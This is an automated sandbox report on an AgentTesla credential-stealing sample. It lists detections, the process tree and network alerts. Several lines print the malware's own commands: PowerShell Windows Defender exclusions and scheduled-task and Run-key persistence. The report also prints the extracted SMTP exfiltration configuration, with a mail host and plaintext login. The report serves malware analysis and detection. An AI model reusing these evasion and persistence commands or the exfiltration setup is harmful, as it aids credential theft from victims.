Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWB#150332.exe

Overview

General Information

Sample name:AWB#150332.exe
Analysis ID:1568202
MD5:def8249dc6df546f68ce491ee14282c9
SHA1:fdaaf599b51a6d13dda0bada44108dca334edddc
SHA256:63382a3cc1e90e7dfa54826a62bfb5da86f4ad44a07cffca70fa3c509bbd5ad7
Tags:AgentTeslaDHLexeuser-cocaman
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AWB#150332.exe (PID: 5432 cmdline: "C:\Users\user\Desktop\AWB#150332.exe" MD5: DEF8249DC6DF546F68CE491EE14282C9)
    • powershell.exe (PID: 2004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7440 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6068 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • nYNBzxFhCu.exe (PID: 7412 cmdline: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe MD5: DEF8249DC6DF546F68CE491EE14282C9)
    • schtasks.exe (PID: 8004 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • boqXv.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • boqXv.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Roaming\boqXv\boqXv.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.azmaplast.com", "Username": "info@azmaplast.com", "Password": "QAZqaz123@@"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.1333001679.0000000002EA2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000015.00000002.2468581975.0000000002F43000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                9.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x33afc:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33b6e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x33bf8:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33c8a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x33cf4:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x33d66:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x33dfc:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33e8c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                0.2.AWB#150332.exe.41e0e58.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.AWB#150332.exe.41e0e58.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 12 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", ProcessId: 2004, ProcessName: powershell.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7200, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boqXv
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", ProcessId: 2004, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe, ParentImage: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exe, ParentProcessId: 7412, ParentProcessName: nYNBzxFhCu.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmp1CDF.tmp", ProcessId: 8004, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 193.141.65.39, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7200, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49707
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", ProcessId: 6068, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\AWB#150332.exe", ProcessId: 2004, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\AWB#150332.exe", ParentImage: C:\Users\user\Desktop\AWB#150332.exe, ParentProcessId: 5432, ParentProcessName: AWB#150332.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nYNBzxFhCu" /XML "C:\Users\user\AppData\Local\Temp\tmpFFF1.tmp", ProcessId: 6068, ProcessName: schtasks.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-04T12:52:54.945943+010020301711A Network Trojan was detected192.168.2.749710193.141.65.39587TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-04T12:52:54.945943+010028397231Malware Command and Control Activity Detected192.168.2.749710193.141.65.39587TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.azmaplast.com", "Username": "info@azmaplast.com", "Password": "QAZqaz123@@"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeReversingLabs: Detection: 26%
                    Multi AV Scanner detection for submitted file
                    Source: AWB#150332.exeReversingLabs: Detection: 26%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: AWB#150332.exeJoe Sandbox ML: detected
                    Source: AWB#150332.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: AWB#150332.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: yOCXb.pdbSHA256N source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
                    Source: Binary string: yOCXb.pdb source: AWB#150332.exe, nYNBzxFhCu.exe.0.dr
                    Source: Binary string: RegSvcs.pdb, source: boqXv.exe, 00000016.00000000.1353896187.0000000000BD2000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr
                    Source: Binary string: RegSvcs.pdb source: boqXv.exe, 00000016.00000000.1353896187.0000000000BD2000.00000002.00000001.01000000.0000000E.sdmp, boqXv.exe.9.dr

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49710 -> 193.141.65.39:587
                    Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.7:49710 -> 193.141.65.39:587
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.7:49707 -> 193.141.65.39:587
                    Source: Joe Sandbox ViewIP Address: 193.141.65.39 193.141.65.39
                    Source: Joe Sandbox ViewASN Name: KPNNL KPNNL
                    Source: global trafficTCP traffic: 192.168.2.7:49707 -> 193.141.65.39:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: mail.azmaplast.com
                    Source: AWB#150332.exe, nYNBzxFhCu.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: AWB#150332.exe, nYNBzxFhCu.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: RegSvcs.exe, 00000009.00000002.1333001679.0000000002EAA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000015.00000002.2468581975.0000000002F4B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.azmaplast.com
                    Source: AWB#150332.exe, nYNBzxFhCu.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: AWB#150332.exe, 00000000.00000002.1258173545.0000000003161000.00000004.00000800.00020000.00000000.sdmp, nYNBzxFhCu.exe, 0000000C.00000002.1333854899.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: AWB#150332.exe, 00000000.00000002.1259265400.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.1329772282.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: AWB#150332.exe, nYNBzxFhCu.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, FaJzHLniypp.cs.Net Code: _5cQa10w
                    Source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, FaJzHLniypp.cs.Net Code: _5cQa10w

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.AWB#150332.exe.41e0e58.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.AWB#150332.exe.41a5e38.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.AWB#150332.exe.41e0e58.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.AWB#150332.exe.41a5e38.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large strings
                    Source: AWB#150332.exe, frmLogin.csLong String: Length: 123476
                    Source: nYNBzxFhCu.exe.0.dr, frmLogin.csLong String: Length: 123476
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_0180D5840_2_0180D584
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_07537F900_2_07537F90
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_075367280_2_07536728
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_075366AA0_2_075366AA
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_0753B4280_2_0753B428
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_0753D0A00_2_0753D0A0
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_0753AFF00_2_0753AFF0
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_07537F800_2_07537F80
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_0753CE300_2_0753CE30
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_0753BC980_2_0753BC98
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_0753BC870_2_0753BC87
                    Source: C:\Users\user\Desktop\AWB#150332.exeCode function: 0_2_0753B8600_2_0753B860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02D1D7389_2_02D1D738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02D1A4A49_2_02D1A4A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02D14AD09_2_02D14AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02D13EB89_2_02D13EB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_02D142009_2_02D14200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062F32A09_2_062F32A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062F43009_2_062F4300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062F00409_2_062F0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062FC0C09_2_062FC0C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062F8F3A9_2_062F8F3A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062FDF789_2_062FDF78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062F5A809_2_062F5A80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062F53A09_2_062F53A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_062F39EF9_2_062F39EF
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_02A8D58412_2_02A8D584
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_073096F812_2_073096F8
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_07327F9012_2_07327F90
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732672812_2_07326728
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_073266AA12_2_073266AA
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732B42812_2_0732B428
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732B41812_2_0732B418
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732700D12_2_0732700D
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732D0A012_2_0732D0A0
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732D09012_2_0732D090
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_07327F8012_2_07327F80
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732AFF012_2_0732AFF0
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732BC9812_2_0732BC98
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732BC8712_2_0732BC87
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732B86012_2_0732B860
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0732B85012_2_0732B850
                    Source: C:\Users\user\AppData\Roaming\nYNBzxFhCu.exeCode function: 12_2_0B96253812_2_0B962538
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0153D73021_2_0153D730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0153981821_2_01539818
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01534AD021_2_01534AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_01533EB821_2_01533EB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0153A3E021_2_0153A3E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_0153420021_2_01534200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_059A8CF021_2_059A8CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_059AB69021_2_059AB690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064A8F4821_2_064A8F48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064A5A8021_2_064A5A80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064A32A021_2_064A32A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064A430021_2_064A4300
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064A004021_2_064A0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064AC0C021_2_064AC0C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064AE0C021_2_064AE0C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064A3A0021_2_064A3A00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 21_2_064A53A021_2_064A53A0
                    Source: AWB#150332.exeStatic PE information: invalid certificate
                    Source: AWB#150332.exe, 00000000.00000002.1257179043.000000000159E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs AWB#150332.exe
